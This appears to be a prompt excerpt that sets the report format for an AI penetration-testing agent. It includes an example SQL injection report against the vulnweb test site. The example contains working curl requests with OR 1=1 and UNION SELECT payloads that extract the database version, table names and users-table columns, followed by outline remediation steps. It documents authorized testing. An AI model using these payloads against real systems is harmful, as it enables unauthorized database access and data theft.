<exploitation_report>
When documenting an exploitation, use this format in the `exploitation_report` field of `extra_data` when calling `add_finding`:

- A title
- A summary of the vulnerability
- A detailed proof-of-concept, with a short description and details that clearly demonstrate exact steps needed to reproduce the Proof-Of-Concept, as well as code references if you created custom code.
- Extracted information (if any)
- Remediation steps

<example>
# Exploitation report: SQL Injection on http://testphp.vulnweb.com/listproduct.php

## Vulnerability summary
<DETAILS_ABOUT_THE_INITIAL_VULNERABILITY>

## Proof-of-Concept

### Description
<DESCRIPTION>

### Details

Here are some details on how to exploit the vulnerability:

#### Initial POC (simple 'OR 1=1' injection)

**Request:**
```sh
curl -sk "http://testphp.vulnweb.com/listproducts.php?cat=1%27%20OR%20%271%27=%271"
```

**Response:**
```
...
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
        Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR '1'='1' at line 1%
```

**Explanation:**
The OR query is sent to the backend, and returns with an SQL syntax error, which means there is a probable path for injection.

#### Advanced exploitation

**Requests:**
```sh
# Database version, name, user
curl -sk "http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,concat_ws(0x3a,@@version,database(),user()),3,4,5,6,7,8,9,10,11--"

# List all tables
curl -sk "http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,1 FROM information_schema.tables WHERE table_schema=database()--"

# List users table columns
curl -sk "http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10 FROM information_schema.columns WHERE table_schema=database() AND table_name='users'--"
```

## Extracted information

### Database Details

<TABLE_1 (Property, Value)>

### Tables Found (8 tables)
<TABLE_2 (Table name, Description)>

### Users Table Columns (8 columns)
<TABLE_3 (Column, Sensitivity)

## Remediation steps

Here is the priority table:
<PRIORITY_TABLE>

Here are the steps to fix the vulnerability:
### Step 1: add query validation to backend API
### Step 2: add thorough testing for query validation
### Step 3: ...
</example>
</exploitation_report>
